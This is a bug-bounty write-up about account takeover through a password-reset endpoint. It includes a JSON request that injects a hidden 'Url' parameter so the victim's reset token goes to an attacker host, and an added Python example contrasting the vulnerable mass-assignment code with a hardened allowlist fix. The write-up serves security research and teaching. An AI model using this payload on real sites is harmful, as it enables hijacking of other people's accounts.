One Click To Account Takeover
Hello amazing hunters.
Today I want to tell a story about my favorite endpoint, again.
In the last story I showed how I was able to take over a user’s account with zero clicks.
Today I want to try another way to take over an account, but this time we need one click from the user. 😉
OVERVIEW:
On target.com, when we request a password reset, we receive an email with a reset password link:
- Target.com/RestPassword/Token/blablablabla
This time, I focused on stealing the user’s token.
In my first try, I injected some headers like:
- “X-Forwarded-Host:”
- “X-Forwarded-For:”
Unfortunately, the site was not vulnerable to host header injection.
In my second try, I noticed a cool thing that let me change the host of the reset password link, but it was not obvious at first.
Golden Tip:
Here is a golden tip for this scenario: pay attention to mass assignment vulnerabilities. If I capture the reset password request, the JSON request body has one parameter:
- {“email” : “Evil@attacker.com”}
I asked myself: could there be hidden parameters in this request?
Normally, if the user sends a request without a value, the parameter is filled with its default value.
Unfortunately, I couldn’t use Param Miner because the endpoint is rate limited and after each tested parameter I had to check the email. I had to test my word list manually :)
After a short time I found a simple parameter that let me change the whole host and path of the reset password link.
When I sent my request with these parameters:
- {“email” : “Evil@attacker.com” , “Url” : “https://Evill.com/Angel/”}
I got :
Yes, We did it. 😎🥂
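To show why the hidden “Url” parameter worked, and how a backend avoids it, here is an added example (my own constructed code, not code from the target or from this write-up). It assumes a reset-link builder that merges the JSON body over server-side defaults (the mass-assignment pattern) next to a hardened version that only reads allowlisted fields and takes the link base from server configuration; the hostname target.example, the function names and the RESET_BASE_URL constant are all assumptions.

```python
"""Password-reset link builder: mass-assignment bug beside the hardened form.

Constructed example, not the target's real code. Assumed names:
RESET_BASE_URL, ALLOWED_FIELDS, build_reset_link_vulnerable,
build_reset_link_hardened, accepts_override.
"""
import secrets
from urllib.parse import urlsplit

# Server-side configuration: the only origin a reset link may ever point to.
# (target.example is a placeholder host.)
RESET_BASE_URL = "https://target.example/RestPassword/Token/"

# Fields a client is allowed to supply on the reset endpoint.
ALLOWED_FIELDS = frozenset({"email"})


class UnexpectedField(ValueError):
    """Raised when the request body carries a field the endpoint never accepts."""


def issue_token() -> str:
    """Unguessable reset token (the value the write-up's attacker wanted)."""
    return secrets.token_urlsafe(32)


def link_host(link: str) -> str:
    """Hostname part of a URL, used to check where a link really points."""
    return urlsplit(link).netloc


def build_reset_link_vulnerable(body: dict, token: str) -> str:
    """Mass-assignment pattern: every key in the JSON body overwrites a
    default, so a client-supplied "Url" silently replaces the link base and
    the token is emailed to the attacker's host."""
    params = {"email": None, "Url": RESET_BASE_URL}
    params.update(body)  # the bug: no allowlist, "Url" comes from the client
    return params["Url"] + token


def build_reset_link_hardened(body: dict, token: str) -> str:
    """Reads only allowlisted fields and builds the link from server config.
    Unknown fields are rejected (and can be logged) instead of being accepted,
    which also makes probing for hidden parameters visible in the logs."""
    extra = set(body) - ALLOWED_FIELDS
    if extra:
        raise UnexpectedField(f"unexpected field(s): {sorted(extra)}")
    email = body.get("email")
    if not isinstance(email, str) or "@" not in email:
        raise ValueError("invalid email")
    link = RESET_BASE_URL + token
    # Defence in depth: the link must still point at our own host.
    if link_host(link) != link_host(RESET_BASE_URL):
        raise RuntimeError("reset link escaped the configured origin")
    return link


def accepts_override(builder, token: str = "tok") -> bool:
    """True if the builder lets a client move the reset link to another host.
    Uses a constructed request body with an extra "Url" field."""
    body = {"email": "user@example.com", "Url": "https://attacker.example/"}
    try:
        return link_host(builder(body, token)) != link_host(RESET_BASE_URL)
    except UnexpectedField:
        return False


if __name__ == "__main__":
    tok = issue_token()
    print("vulnerable accepts override:", accepts_override(build_reset_link_vulnerable))
    print("hardened accepts override:  ", accepts_override(build_reset_link_hardened))
    print("hardened link:", build_reset_link_hardened({"email": "user@example.com"}, tok))
```

The design point is that the reset link base is never a request parameter at all: it is server configuration, the body is validated against an explicit allowlist, and an unexpected field is rejected loudly rather than merged in, so a probe for hidden parameters shows up as a logged error instead of a working token leak.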
EXPLOIT
To exploit this vulnerability, we enter the victim’s email, capture the request, add the “Url” parameter with my Burp Collaborator address as its value, then forward the request. Only one click from the user is needed for account takeover.
After the user clicks the link, we receive his/her token in Burp Collaborator, then enter the token, ….. 😉
I hope this write-up was helpful for you. Have a good day.